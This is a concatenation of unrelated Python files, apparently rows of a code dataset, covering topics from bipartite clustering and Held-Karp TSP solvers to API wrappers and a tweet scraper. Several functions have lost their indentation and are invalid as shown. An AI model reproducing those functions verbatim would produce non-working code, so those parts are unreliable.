       Basic notions for the analysis of large two-mode networks.
       Social Networks 30(1), 31--48.
    """
    if nodes is None:
        nodes = G
    # Per-node coefficients, then the arithmetic mean over the requested nodes.
    ccs = latapy_clustering(G, nodes=nodes, mode=mode)
    return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
    r"""Compute the bipartite clustering of G.

    Robins and Alexander [1]_ defined bipartite clustering coefficient as
    four times the number of four cycles `C_4` divided by the number of
    three paths `L_3` in a bipartite graph:

    .. math::

       CC_4 = \frac{4 * C_4}{L_3}

    Parameters
    ----------
    G : graph
        a bipartite graph

    Returns
    -------
    clustering : float
       The Robins and Alexander bipartite clustering for the input graph.

    Examples
    --------
    >>> from networkx.algorithms import bipartite
    >>> G = nx.davis_southern_women_graph()
    >>> print(round(bipartite.robins_alexander_clustering(G), 3))
    0.468

    See Also
    --------
    latapy_clustering
    square_clustering

    References
    ----------
    .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
           directors: Network structure and distance in bipartite graphs.
           Computational & Mathematical Organization Theory 10(1), 69–94.
    """
    # Too small to contain a four-cycle: needs at least 4 nodes and 3 edges.
    if G.order() < 4 or G.size() < 3:
        return 0
    L_3 = _threepaths(G)
    if L_3 == 0:
        # No three-paths means the ratio is undefined; report 0.
        return 0
    C_4 = _four_cycles(G)
    return (4. * C_4) / L_3
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in set(G[u]) - set([v]):
paths += len(set(G[w]) - set([v, u]))
# Divide by two because we count each three path twice
# one for each possible starting point
return paths / 2
|
8,064 | 63cce356b792949b90b215e0a5826f7b33d2d375 | # System import
import os
# Docutils import
from docutils import nodes
from docutils.parsers.rst.directives.admonitions import BaseAdmonition
from docutils.statemachine import ViewList
# Add node
class link_to_block(nodes.Admonition, nodes.Element):
    """Doctree node rendered in HTML as a button-styled ``<div>`` wrapper."""
    pass
# Add directive
class LinkToBlock(BaseAdmonition):
    """Directive that inserts a ``:ref:`` link wrapped in a ``link_to_block`` node.

    The single required argument is the target label; ``:label:`` overrides
    the visible button text and ``:right-side:`` controls the CSS class used
    by the HTML writer.
    """
    node_class = link_to_block
    has_content = False
    required_arguments = 1
    optional_arguments = 2
    final_argument_whitespace = True
    option_spec = {
        "right-side": bool,
        "label": str
    }

    def run(self):
        # Construct an empty node
        new_content = ViewList()
        # Build the docutils reference: ":ref:`<label> <target>`".
        ref = u":ref:`{0} <{1}>`".format(
            self.options.get("label", "Link To"),
            "".join(self.arguments))
        # NOTE(review): ViewList.append's ``source`` is normally a source-file
        # name; passing self.content here looks suspicious — confirm intent.
        new_content.append(ref, source=self.content)
        self.content = new_content
        return super(LinkToBlock, self).run()
# Add html writer
def visit_ltb_html(self, node):
    """Open the wrapping ``<div>`` whose CSS class selects the button's side."""
    css_class = "buttonNext" if node.get("right-side", True) else "buttonPrevious"
    self.body.append("<div class='{0}'>".format(css_class))
def depart_ltb_html(self, node):
    """ Depart link to block"""
    # Add close div
    # NOTE(review): relies on the standard admonition departure to close the
    # element; confirm it emits the closing tag for the div opened on visit.
    self.depart_admonition(node)
# Register new directive
def setup(app):
    """Sphinx entry point: register the directive and its HTML visitors."""
    app.add_directive("link-to-block", LinkToBlock)
    app.add_node(link_to_block, html=(visit_ltb_html, depart_ltb_html))
|
# setuptools, not distutils.core: ``distutils.core.setup`` silently ignores
# the ``install_requires`` keyword, so the 'bottle' dependency was never
# actually declared to the installer.
from setuptools import setup

setup(
    name="zuknuft",
    version="0.1",
    author="riotbib",
    author_email="riotbib@github",
    # NOTE(review): package name "zuknuft" vs script "zukunft.py" — one of the
    # two spellings is likely a typo; confirm which is intended.
    scripts=["zukunft.py"],
    install_requires=[
        'bottle',
    ],
)
|
8,066 | 0bbc8aa77436193ab47c0fe8cf0d7c6dffcfe097 | from marko.parser import Parser # type: ignore
from marko.block import Heading, Paragraph, CodeBlock, List # type: ignore
from marko.inline import CodeSpan # type: ignore
from langcreator.common import Generators, InputOutputGenerator, tag_regex, get_tags, builtin_generators
import collections
import re
def parse(content: str) -> Generators:
    """Parse a markdown generator spec into a ``Generators`` mapping.

    Headings open a new generator section; inline code spans declare an
    output pattern; fenced code blocks list input examples for the most
    recent output; bullet lists define list-style generators.

    Raises ``Exception`` on malformed specs (duplicate/invalid tag names,
    missing outputs or inputs, mixed list/dict sections, undefined tags).
    """
    parser = Parser()
    document = parser.parse(content)
    tag_name = ""
    last_output = None
    generators: Generators = {}
    for item in document.children:
        if type(item) == Heading:
            # Validate the section we are leaving before opening a new one.
            _check_previous_generator(generators, tag_name)
            # TODO: test
            last_output = None
            tag_name = item.children[0].children
            _check_tag_name(tag_name)
            _check_defined_twice(generators, tag_name)
            generators[tag_name] = {}
        elif type(item) == Paragraph and type(item.children[0]) == CodeSpan:
            current_generator = generators[tag_name]
            if type(current_generator) == dict:
                # "<empty>" is the spec's marker for the empty string.
                last_output = item.children[0].children.replace("<empty>", "")
                current_generator[last_output] = []
            else:
                raise Exception(f"Mixing list and inputs/output in {tag_name}")
        elif type(item) == CodeBlock:
            current_generator = generators[tag_name]
            if last_output is None:
                # TODO: test
                raise Exception(
                    f"Input example defined without output in {tag_name}")
            elif type(current_generator) == dict:
                inputs = item.children[0].children.strip().split("\n")
                inputs = [x.replace("<empty>", "") for x in inputs]
                current_generator[last_output] += inputs
                _check_tags(current_generator, tag_name)
            else:
                raise Exception(f"Mixing list and inputs/output in {tag_name}")
        elif type(item) == List:
            # Bullet list: the generator is simply a list of tag names.
            generators[tag_name] = [
                x.children[0].children[0].children for x in item.children
            ]
    # Validate the final section and cross-check all tag references.
    _check_previous_generator(generators, tag_name)
    _check_all_used_tags(generators)
    return generators
def _check_tags(generator: InputOutputGenerator, name: str):
    """Verify each input example carries every tag its output pattern needs,
    at least as many times as the output uses it."""
    for output, inputs in generator.items():
        # Required multiplicity of each tag, derived from the output pattern.
        necessary_tags = dict(collections.Counter(get_tags(output)))
        for index, input in enumerate(inputs):
            input_tags = dict(collections.Counter(get_tags(input)))
            for tag, count in necessary_tags.items():
                # NOTE(review): quotes are stripped from the required tag here,
                # but input_tags keys are used verbatim — confirm get_tags never
                # yields quoted tags on the input side, or this lookup misfires.
                tag = tag.replace("'", "")
                if tag not in input_tags:
                    raise Exception(
                        f"missing {tag} in example {index + 1} of {name} `{output}`"
                    )
                diff = count - input_tags[tag]
                if diff > 0:
                    raise Exception(
                        f"missing {diff} {tag} in example {index + 1} of {name} `{output}`. "
                        +
                        f"Expected to find {count} {tag}, found {input_tags[tag]}."
                    )
def _check_tag_name(tag):
    """Reject heading tags that do not fully match the shared tag pattern."""
    candidate = "#" + tag.strip()
    if re.fullmatch(tag_regex, candidate):
        return
    raise Exception("# %s is invalid, only letters and _ are allowed" %
                    (tag))
def _check_defined_twice(generators, tag):
if tag in generators:
raise Exception("# %s is being defined twice" % (tag))
def _check_previous_generator(generators, name):
if not name:
return
if type(generators[name]) == list:
return
if len(generators[name]) == 0:
raise Exception("output missing on # %s" % name)
for index, inputs in enumerate(generators[name].values()):
if len(inputs) == 0:
raise Exception(
f"input examples missing on # {name}, on example #{index}")
def _check_all_used_tags(generators):
    """Ensure every referenced tag is either built in or defined in the spec."""
    # All legal references: built-in generators plus every parsed section.
    available_tags = ["#" + x for x in builtin_generators
                      ] + ["#" + x for x in generators.keys()]
    for key, generator in generators.items():
        if type(generator) == list:
            # List-style generators reference tags directly by bare name.
            for tag in generator:
                if "#" + tag not in available_tags:
                    raise Exception(
                        "- %s is used in # %s but it's not defined anywhere. Defined tags are %s"
                        % (tag, key, ", ".join(available_tags)))
        else:
            # Dict-style generators embed tags inside their output patterns.
            for output in generator.keys():
                tags = get_tags(output)
                for tag in tags:
                    if tag not in available_tags:
                        raise Exception(
                            "%s is used in # %s but it's not defined anywhere. Defined tags are %s"
                            % (tag, key, ", ".join(available_tags)))
|
8,067 | a33abd253288140f8051aced1d0ed1e41b2fc786 | from flask import Blueprint
# Blueprint for the Vue demo pages; the views module attaches routes to it.
application_vue_demo = Blueprint('application_vue_demo', __name__)

# Imported last so the views module can see the blueprint defined above
# without a circular-import failure at load time.
from. import views
|
8,068 | 3c6ef57501e01da79f894b36726a93a3a5e0a8f6 | # RUSH HOUR
# Read passenger counts from the operator.
m = int(input('Enter number of males:'))
f = int(input('Enter number of females:'))
# m2: trains needed for the males at 20 per train; c: males in the last,
# partially filled train (20 when it is exactly full).
# NOTE(review): the capacity rules below (20 males and 10 females per train,
# 30 females per extra train) are undocumented — confirm against the original
# problem statement.
if m%20 == 0:
    m2 = m//20
    c = 20
else:
    m2 = m//20+1
    c = m%20
# Females left over after 10 ride along on each of the m2 trains.
f2 = f - 10*m2
if f2 <= 0 or f2-(20-c) <=0:
    print('Number of trains needed: '+str(m2))
else:
    print('Number of trains needed: '+str(1+(f2-(20-c))//30+m2))
|
8,069 | c716f43dbe62f662c60653f09be946a27c3fff66 | import Adafruit_BBIO.GPIO as GPIO
from pydrs import SerialDRS
import time
import sys
sys.dont_write_bytecode = True
class SyncRecv:
    """Loopback test of the DRS sync fibre-optic receivers from a BeagleBone.

    Drives the local sync transmitter pin and checks the sync receiver
    follows (HIGH -> reads 1, LOW -> reads 0), then toggles all DRS
    transmitters via ClearPof/SetPof and checks the EPWM sync input.
    """

    def __init__(self):
        # Serial link to the DRS unit.
        self._comport = '/dev/ttyUSB0'
        self._baudrate = '115200'
        self._epwm_sync_pin = 'GPIO2_23'  # Input in BBB perspective
        self._sync_in_pin = 'GPIO2_25'  # Input in BBB perspective
        self._sync_out_pin = 'GPIO1_14'  # Output in BBB perspective
        self.setup_pins()

    def setup_pins(self):
        # Configure pin directions to match the roles noted above.
        GPIO.setup(self._epwm_sync_pin, GPIO.IN)
        GPIO.setup(self._sync_in_pin, GPIO.IN)
        GPIO.setup(self._sync_out_pin, GPIO.OUT)

    def do_syncrecv_test(self):
        """Run the receiver test; return True only if every reading matches."""
        drs = SerialDRS()
        conn = drs.Connect(self._comport, self._baudrate)
        if not conn:
            print("Erro conexao serial")
            return False
        print("Iniciando teste dos receptores de fibra - sync")
        print('Desliga transmissor sync')
        GPIO.output(self._sync_out_pin, GPIO.HIGH)  # transmitter off
        print('Le receptor sync (Esperado = 1)')
        sts_sync_in = GPIO.input(self._sync_in_pin)
        print('status: ' + str(sts_sync_in))
        if sts_sync_in:
            print('Liga transmissor sync')
            GPIO.output(self._sync_out_pin, GPIO.LOW)  # transmitter on
            print('Le receptor sync (Esperado = 0)')
            sts_sync_in = GPIO.input(self._sync_in_pin)
            print('status: ' + str(sts_sync_in))
            if not sts_sync_in:
                print('DRS desligando todos os transmissores')
                drs.ClearPof()
                print('Lendo EPWM sync (Esperado = 1)')
                sts_epwm_sync = GPIO.input(self._epwm_sync_pin)
                print('status: ' + str(sts_epwm_sync))
                if sts_epwm_sync:
                    print('DRS ligando todos os transmissores')
                    drs.SetPof()
                    print('Lendo EPWM sync (Esperado = 0)')
                    sts_epwm_sync = GPIO.input(self._epwm_sync_pin)
                    print('status: ' + str(sts_epwm_sync))
                    if not sts_epwm_sync:
                        # Every stage matched its expectation.
                        drs.Disconnect()
                        return True
        print("Falha receptores sync")
        drs.Disconnect()
        return False
|
8,070 | 3e8fa71c4e23348c6f00fe97729b5717bb6245a1 | '''
held-karp.py
Implementation of the Bellman-Held-Karp Algorithm to exactly solve TSPs,
requiring no external dependencies.
Includes a purely recursive implementation, as well as both top-down and
bottom-up dynamic programming approaches.
'''
import sys
def held_karp_recursive(distance_matrix):
    '''
    Solution to TSP using the Bellman-Held-Karp Algorithm.

    Given the adjacency matrix of a TSP instance, find the minimum cost
    Hamiltonian cycle through the graph as well as the corresponding path.

    Returns:
        (cost, path) where path starts and ends at city 0.
    '''
    d = distance_matrix
    n = len(d)

    def f(i, visited, path_so_far):
        '''
        f(i, visited, path_so_far) is the minimum-distance path from city i
        back to city 0 that passes through all cities still unvisited in the
        bitmask ``visited`` (bit j set == city j visited); ``path_so_far`` is
        the path from city 0 up to i.  The answer is f(0, 0, []), with:

            f(i, visited) = min_{j unvisited} ( d(i,j) + f(j, visited|1<<j) )
        '''
        # Base case: all cities visited, close the tour back at city 0.
        if visited == (1 << n) - 1:
            return d[i][0], path_so_far + [0]
        # float('inf') replaces the Python-2-only sys.maxint so this runs
        # unchanged on both Python 2 and Python 3.
        min_dist = float('inf')
        min_path = None
        # range (not the removed xrange) for the same portability reason.
        for j in range(n):
            if not (1 << j) & visited:
                dist_from_j, path_with_j = \
                    f(j, visited | (1 << j), path_so_far + [j])
                dist_with_j = d[i][j] + dist_from_j
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    min_path = path_with_j
        return min_dist, min_path

    return f(0, 0, [])
def held_karp_topdown(distance_matrix):
    '''
    Memoized (top-down) Held-Karp: overlapping subproblems are cached in a
    dp table of size n x 2^n, and a parallel ``child`` table records which
    city was chosen after each (i, visited) state so the optimal tour can be
    reconstructed afterwards.

    Returns:
        (cost, path) where path starts and ends at city 0.
    '''
    d = distance_matrix
    n = len(d)
    # dp[i][visited]: min cost from city i back to 0 through all cities not
    # yet marked in ``visited``; child[i][visited]: successor city chosen.
    dp = [[None for i in range(2 ** n)] for j in range(n)]
    child = [[None for i in range(2 ** n)] for j in range(n)]

    def f(i, visited):
        '''Memoized recurrence; identical to the purely recursive version
        except that results are cached and the path is rebuilt later from
        the ``child`` table.'''
        # `is not None` rather than truthiness: a cached cost of 0 (e.g. a
        # zero self-distance) must not be recomputed.
        if dp[i][visited] is not None:
            return dp[i][visited]
        # Base case: every city visited, return home to city 0.
        if visited == (1 << n) - 1:
            dp[i][visited] = d[i][0]
            child[i][visited] = 0
            return d[i][0]
        # float('inf') / range replace the Python-2-only sys.maxint / xrange.
        min_dist = float('inf')
        chosen_j = None
        for j in range(n):
            if not (1 << j) & visited:
                dist_with_j = d[i][j] + f(j, (1 << j) | visited)
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    chosen_j = j
        dp[i][visited] = min_dist
        child[i][visited] = chosen_j
        return min_dist

    # The value we are interested in: start at city 0 with only 0 visited.
    ans = f(0, 1)
    # Rebuild the optimal tour by walking the child table from (0, {0}).
    path = [0]
    i, visited = 0, 1
    next_ = child[i][visited]
    while next_ is not None:
        path.append(next_)
        visited |= (1 << next_)
        next_ = child[next_][visited]
    return ans, path
def held_karp_bottomup(distance_matrix):
    '''
    Tabulated (bottom-up) Held-Karp: every subproblem (i, visited) is filled
    in from the largest visited-masks downward, then the optimal tour is
    reconstructed by walking the table with the known optimal cost.

    Returns:
        (cost, path) where path starts and ends at city 0.
    '''
    d = distance_matrix
    n = len(d)
    dp = [[None for i in range(2 ** n)] for j in range(n)]

    # Base case: cost of returning home from i once every city is visited.
    for i in range(n):
        dp[i][(1 << n) - 1] = d[i][0]

    # Fill the table from the fullest masks down; each lookup below uses a
    # strictly larger mask, already computed.  range/reversed replace the
    # Python-2-only xrange; float('inf') replaces sys.maxint.
    for visited in reversed(range((1 << n) - 1)):
        for i in range(n):
            min_dist = float('inf')
            for j in range(n):
                if not (1 << j) & visited:
                    dist_j = d[i][j] + dp[j][visited | (1 << j)]
                    if dist_j < min_dist:
                        min_dist = dist_j
            dp[i][visited] = min_dist

    ans = dp[0][1]
    # Reconstruct the tour: at each step the successor j is the city whose
    # table entry accounts for exactly d[i][j] of the remaining cost.
    path = [0]
    i, visited = 0, 1
    cost_from_i = dp[i][visited]
    while visited != (1 << n) - 1:
        for j in range(n):
            if not visited & (1 << j):
                cost_from_j = dp[j][visited | (1 << j)]
                # A tolerance is required for real-valued distances.
                if abs((cost_from_i - cost_from_j) - d[i][j]) < 0.001:
                    # j was the city selected in the optimal solution.
                    path.append(j)
                    i, visited = j, visited | (1 << j)
                    cost_from_i = cost_from_j
                    break
    # All cities visited; close the tour at city 0.
    path.append(0)
    return ans, path
class Vertex:
    ''' Simple implementation of a point in Euclidean space '''

    def __init__(self, x, y):
        # Coerce to float up front so distance arithmetic is uniform.
        self.x, self.y = float(x), float(y)
def distance(v1, v2):
    ''' Euclidean distance between two `Vertex` instances '''
    dx = v1.x - v2.x
    dy = v1.y - v2.y
    return (dx * dx + dy * dy) ** 0.5
def adjacency_matrix(graph):
    '''
    Construct the corresponding adjacency matrix from a list of vertices in a
    graph, assumed to be a complete graph.
    '''
    # range (not the Python-2-only xrange) keeps this working on Python 3;
    # the comprehension fills each entry directly instead of mutating Nones.
    n = len(graph)
    return [[distance(graph[i], graph[j]) for j in range(n)]
            for i in range(n)]
def main():
    ## Test cases
    # Smoke test: all three solvers must agree on two small instances.
    # g1: (16.0, [0, 2, 1, 3, 0])
    g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]
    m1 = adjacency_matrix(g1)
    for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:
        cost, path = solver(m1)
        assert cost == 16.0
        assert path == [0, 2, 1, 3, 0]
    # g2: (15.773387165490545, [0, 3, 1, 2, 4, 0])
    g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]
    m2 = adjacency_matrix(g2)
    for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:
        cost, path = solver(m2)
        # Real-valued tour cost: compare with a tolerance.
        assert abs(cost - 15.7733871) < 0.001
        assert path == [0, 3, 1, 2, 4, 0]

if __name__ == '__main__':
    main()
|
8,071 | 9d4559a363c4fd6f9a22dc493a7aaa0a22386c21 | import pandas as pd
from pymongo import MongoClient
import numpy as np
# Connect to the local MongoDB instance that stores the people-counter data.
mongo_client = MongoClient('localhost', 27018)
mongo_db = mongo_client['ProjetoIN242']
mongo_collection = mongo_db['contadorpessoas']
# Fetch every document and load it into a DataFrame.
query = mongo_collection.find({})
df = pd.DataFrame.from_records(query)
df_filtro = df[['Entrada','Dia', 'Quantidade de pessoas']] ## column selection
# Plot the mean number of people per day.
df_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y= 'Quantidade de pessoas')
|
8,072 | 5cd573f2b7f91a8b20e96deb1004c0ef7fc62398 | from funct import read_excel
import requests
import unittest
import HTMLTestReportCN
class v2exapi(unittest.TestCase):
    """Live API smoke tests (require network access)."""

    def test_node_api(self):
        # The v2ex node API must echo back each node name read from the sheet.
        url = "https://www.v2ex.com/api/nodes/show.json"
        #querystring = {"name":"php"}
        a=read_excel("xx.xlsx",0,0)
        for node_name in a:
            #for node_name in ['php',"python","qna"]:
            response = requests.request("GET", url, params={"name":node_name}).json()
            self.assertEqual(response['name'],node_name)
            print(response)

    def test_nade_type(self):
        # NOTE(review): name looks like a typo for "node", but renaming would
        # change which tests the runner discovers, so it is left untouched.
        # This test only prints the response; it asserts nothing.
        url = "https://www.apiopen.top/novelSearchApi"
        querystring = {"name": "%E7%9B%98%E9%BE%99"}
        headers = {
            'Cache-Control': "no-cache",
            'Postman-Token': "b249737d-aa24-4592-adf1-d19114f3f567"
        }
        response = requests.request("GET", url, headers=headers, params=querystring)
        print(response.text)
if __name__ == '__main__':
    #unittest.main()
    # Collect the suite and render it with the Chinese HTML report runner.
    suiteTest = unittest.TestSuite()
    suiteTest.addTest(unittest.makeSuite(v2exapi))
    filepath = '' + 'report.html'
    # filepath='C:\\'+now+'.html'
    fp = open(filepath, 'wb')
    # Title and description of the generated test report.
    runner = HTMLTestReportCN.HTMLTestRunner(stream=fp, title=u'自动化测试报告', description=u'测试报告')
    runner.run(suiteTest)
    fp.close()
    #print(type(list1))
8,073 | e14c7eb11c06d6de5c2f9f8adfb8b742fcb432e1 | #!/usr/bin/env python
"""
haxor
Unofficial Python wrapper for official Hacker News API
@author avinash sajjanshetty
@email hi@avi.im
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import datetime
import json
import sys
import requests
from .settings import supported_api_versions
__all__ = [
'User',
'Item',
'HackerNews',
'InvalidAPIVersion',
'InvalidItemID',
'InvalidUserID']
class InvalidItemID(Exception):
    """Raised when no Hacker News item exists for the requested id."""
    pass

class InvalidUserID(Exception):
    """Raised when no Hacker News user exists for the requested id."""
    pass

class InvalidAPIVersion(Exception):
    """Raised when the requested version is not in supported_api_versions."""
    pass

class HTTPError(Exception):
    """Raised when the API answers with a non-OK HTTP status."""
    pass
class HackerNews(object):
    """Thin client for the official Hacker News Firebase API."""

    def __init__(self, version='v0'):
        """
        Args:
            version (string): specifies Hacker News API version. Default is `v0`.

        Raises:
          InvalidAPIVersion: If Hacker News version is not supported.
        """
        try:
            self.base_url = supported_api_versions[version]
        except KeyError:
            raise InvalidAPIVersion

    def _get(self, url):
        """Internal method used for GET requests

        Args:
            url (string): URL to send GET.

        Returns:
            requests' response object

        Raises:
          HTTPError: If HTTP request failed.
        """
        response = requests.get(url)
        if response.status_code == requests.codes.ok:
            return response
        else:
            raise HTTPError

    def _get_page(self, page):
        # Compose "<base_url><page>.json" and fetch it.
        return self._get('{0}{1}.json'.format(self.base_url, page))

    def _get_page_param(self, page, param):
        # Compose "<base_url><page>/<param>.json" and fetch it.
        return self._get('{0}{1}/{2}.json'.format(self.base_url, page, param))

    def get_item(self, item_id):
        """Returns Hacker News `Item` object.

        Args:
            item_id (int or string): Unique item id of Hacker News story, comment etc.

        Returns:
            `Item` object representing Hacker News item.

        Raises:
          InvalidItemID: If corresponding Hacker News story does not exist.
        """
        # The API returns null (-> falsy) for ids that do not exist.
        response = self._get_page_param('item', item_id).json()
        if not response:
            raise InvalidItemID
        return Item(response)

    def get_user(self, user_id):
        """Returns Hacker News `User` object.

        Args:
            user_id (string): unique user id of a Hacker News user.

        Returns:
            `User` object representing a user on Hacker News.

        Raises:
          InvalidUserID: If no such user exists on Hacker News.
        """
        response = self._get_page_param('user', user_id).json()
        if not response:
            raise InvalidUserID
        return User(response)

    def top_stories(self, limit=None):
        """Returns list of item ids of current top stories

        Args:
            limit (int): specifies the number of stories to be returned.

        Returns:
            `list` object containing ids of top stories.
        """
        # limit=None slices to the full list.
        return self._get_page('topstories').json()[:limit]

    def new_stories(self, limit=None):
        """Returns list of item ids of current new stories

        Args:
            limit (int): specifies the number of stories to be returned.

        Returns:
            `list` object containing ids of new stories.
        """
        return self._get_page('newstories').json()[:limit]

    def ask_stories(self, limit=None):
        """Returns list of item ids of latest Ask HN stories

        Args:
            limit (int): specifies the number of stories to be returned.

        Returns:
            `list` object containing ids of Ask HN stories.
        """
        return self._get_page('askstories').json()[:limit]

    def show_stories(self, limit=None):
        """Returns list of item ids of latest Show HN stories

        Args:
            limit (int): specifies the number of stories to be returned.

        Returns:
            `list` object containing ids of Show HN stories.
        """
        return self._get_page('showstories').json()[:limit]

    def job_stories(self, limit=None):
        """Returns list of item ids of latest Job stories

        Args:
            limit (int): specifies the number of stories to be returned.

        Returns:
            `list` object containing ids of Job stories.
        """
        return self._get_page('jobstories').json()[:limit]

    def updates(self):
        """Returns list of item ids and user ids that have been
        changed/updated recently.

        Returns:
            `dict` with two keys whose values are `list` objects
        """
        return self._get_page('updates').json()

    def get_max_item(self):
        """Returns the current largest (most recently assigned) item id.

        Returns:
            `int` if successful.
        """
        return self._get_page('maxitem').json()
class Item(object):
    """
    Represents stories, comments, jobs, Ask HNs and polls
    """

    def __init__(self, data):
        # Map the raw API dict onto attributes; absent keys become None.
        self.item_id = data.get('id')
        self.deleted = data.get('deleted')
        self.item_type = data.get('type')
        self.by = data.get('by')
        # A missing timestamp defaults to the epoch rather than raising.
        self.submission_time = datetime.datetime.fromtimestamp(
            data.get(
                'time',
                0))
        self.text = data.get('text')
        self.dead = data.get('dead')
        self.parent = data.get('parent')
        self.kids = data.get('kids')
        self.descendants = data.get('descendants')
        self.url = data.get('url')
        self.score = data.get('score')
        self.title = data.get('title')
        self.parts = data.get('parts')
        # Keep the full payload for any fields not mapped above.
        self.raw = json.dumps(data)

    def __repr__(self):
        retval = '<hackernews.Item: {0} - {1}>'.format(
            self.item_id, self.title)
        if sys.version_info.major < 3:
            # Python 2 expects __repr__ to return bytes.
            return retval.encode('utf-8', errors='backslashreplace')
        return retval
class User(object):
    """
    Represents a hacker i.e. a user on Hacker News
    """

    def __init__(self, data):
        # Map the raw API dict onto attributes; absent keys become None.
        self.user_id = data.get('id')
        self.delay = data.get('delay')
        # A missing creation time defaults to the epoch rather than raising.
        self.created = datetime.datetime.fromtimestamp(data.get('created', 0))
        self.karma = data.get('karma')
        self.about = data.get('about')
        self.submitted = data.get('submitted')
        # Keep the full payload for any fields not mapped above.
        self.raw = json.dumps(data)

    def __repr__(self):
        retval = '<hackernews.User: {0}>'.format(self.user_id)
        if sys.version_info.major < 3:
            # Python 2 expects __repr__ to return bytes.
            return retval.encode('utf-8', errors='backslashreplace')
        return retval
|
8,074 | 02230b44568808757fe45fd18d28881d9bc3e410 | #!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
import scraperwiki
import json
#Twitter API credentials - these need adding
consumer_key = ""
consumer_secret = ""
access_key = ""
access_secret = ""
def get_all_tweets(screen_name):
    #Twitter only allows access to a users most recent 3240 tweets with this method
    #authorize twitter, initialize tweepy
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_key, access_secret)
    api = tweepy.API(auth)
    #Better to be api = tweepy.API(auth, parser=JSONParser())
    #See http://stackoverflow.com/questions/14856526/parsing-twitter-json-object-in-python
    #initialize a list to hold all the tweepy Tweets
    alltweets = []
    #make initial request for most recent tweets (200 is the maximum allowed count)
    new_tweets = api.user_timeline(screen_name = screen_name,count=200)
    #save most recent tweets
    alltweets.extend(new_tweets)
    #save the id of the oldest tweet less one
    oldest = alltweets[-1].id - 1
    print "oldest: ", oldest
    print "alltweets[0]: ", alltweets[0]
    #Converts first tweet to text
    #see http://stackoverflow.com/questions/27900451/convert-tweepy-status-object-into-json
    json_str = json.dumps(alltweets[0]._json)
    #CONVERT TO LOOP TO DO SAME TO ALL TWEETS
    record = {}
    print "len(alltweets)", len(alltweets)
    # NOTE(review): this first pass only covers the initial 200 tweets and the
    # same field-extraction code is duplicated after the while-loop below; a
    # shared helper (and json.loads instead of string-splitting the raw JSON)
    # would be safer, but is left untouched here.
    for tweet in alltweets:
        print "type(tweet)", type(tweet)
        json_str = json.dumps(tweet._json)
        print "type(tweet) 2", type(json_str)
        print "json_str:", json_str
        #Split tweet on commas to create an array
        tweetarray = json_str.split(', "')
        #tweetid2 = json_str.split('/status/')[1].split('/')[0]
        # Brittle: fields are carved out of the serialized JSON by substring.
        tweetid = json_str.split('"id": ')[1].split(',')[0]
        tweettxt = json_str.split('"text": ')[1].split(', "is_quote_status"')[0]
        tweetdate = json_str.split('"created_at": "')[2].split('", "')[0]
        name = json_str.split('"name": "')[1].split('", "')[0]
        screenname = json_str.split('"screen_name": "')[1].split('", "')[0]
        tweeturl = "https://twitter.com/"+screenname+"/status/"+tweetid
        record['tweetid'] = tweetid
        record['tweettxt'] = tweettxt
        record['tweetdate'] = tweetdate
        record['name'] = name
        record['screenname'] = screenname#
        record['tweeturl'] = tweeturl
        print "record: ", record
        scraperwiki.sql.save(['tweetid'], record)
    #keep grabbing tweets until there are no tweets left to grab
    while len(new_tweets) > 0:
        print "getting tweets before %s" % (oldest)
        #all subsiquent requests use the max_id param to prevent duplicates
        new_tweets = api.user_timeline(screen_name = screen_name,count=200,max_id=oldest)
        #save most recent tweets
        alltweets.extend(new_tweets)
        #update the id of the oldest tweet less one
        oldest = alltweets[-1].id - 1
        print "...%s tweets downloaded so far" % (len(alltweets))
    #transform the tweepy tweets into a 2D array that will populate the csv
    #outtweets = [[tweet.id_str, tweet.created_at, tweet.text.encode("utf-8")] for tweet in alltweets]
    #need to convert to a dict before saving - could do it in the loop above rather than at end
    # Second pass: re-saves the first 200 tweets (same primary key) plus all
    # the ones fetched by the pagination loop above.
    for tweet in alltweets:
        print "type(tweet)", type(tweet)
        json_str = json.dumps(tweet._json)
        print "type(tweet) 2", type(json_str)
        print "json_str:", json_str
        tweetarray = json_str.split(', "')
        tweetid = json_str.split('"id": ')[1].split(',')[0]
        tweettxt = json_str.split('"text": ')[1].split(', "is_quote_status"')[0]
        tweetdate = json_str.split('"created_at": "')[2].split('", "')[0]
        name = json_str.split('"name": "')[1].split('", "')[0]
        screenname = json_str.split('"screen_name": "')[1].split('", "')[0]
        tweeturl = "https://twitter.com/"+screenname+"/status/"+tweetid
        record['tweetid'] = tweetid
        record['tweettxt'] = tweettxt
        record['tweetdate'] = tweetdate
        record['name'] = name
        record['screenname'] = screenname#
        record['tweeturl'] = tweeturl
        print "record: ", record
        scraperwiki.sql.save(['tweetid'], record)
#Add names as strings to this list
accountslist = []

if __name__ == '__main__':
    # Guard hoisted out of the loop: the original re-tested __name__ on every
    # iteration.  Download the timeline of each configured account.
    for account in accountslist:
        get_all_tweets(account)
|
8,075 | c81889cf4d87933b562aa4618bc5185a8d213107 | #! /usr/bin/env python
import os
import re
from codecs import open
from setuptools import find_packages, setup
here = os.path.abspath(os.path.dirname(__file__))
def get_changelog():
    """Return a fresh Changelog header plus the most recent releases,
    truncated at the sixth ``=``-underline found in the CHANGELOG file."""
    with open(os.path.join(here, 'CHANGELOG'), encoding='utf-8') as f:
        raw = f.read()
    underlines = list(re.finditer('^=+$', raw, re.MULTILINE))
    truncated = raw[:underlines[5].start()]
    # Drop the trailing line (the next release's title) left by the cut.
    kept_lines = truncated.splitlines()[:-1]
    return '=========\nChangelog\n=========\n\n' + '\n'.join(kept_lines)
# Execute __version__.py to collect metadata without importing the package.
about = {}
with open(os.path.join(here, 'devpi_server', '__version__.py'), 'r', 'utf-8') as f:
    exec(f.read(), about)

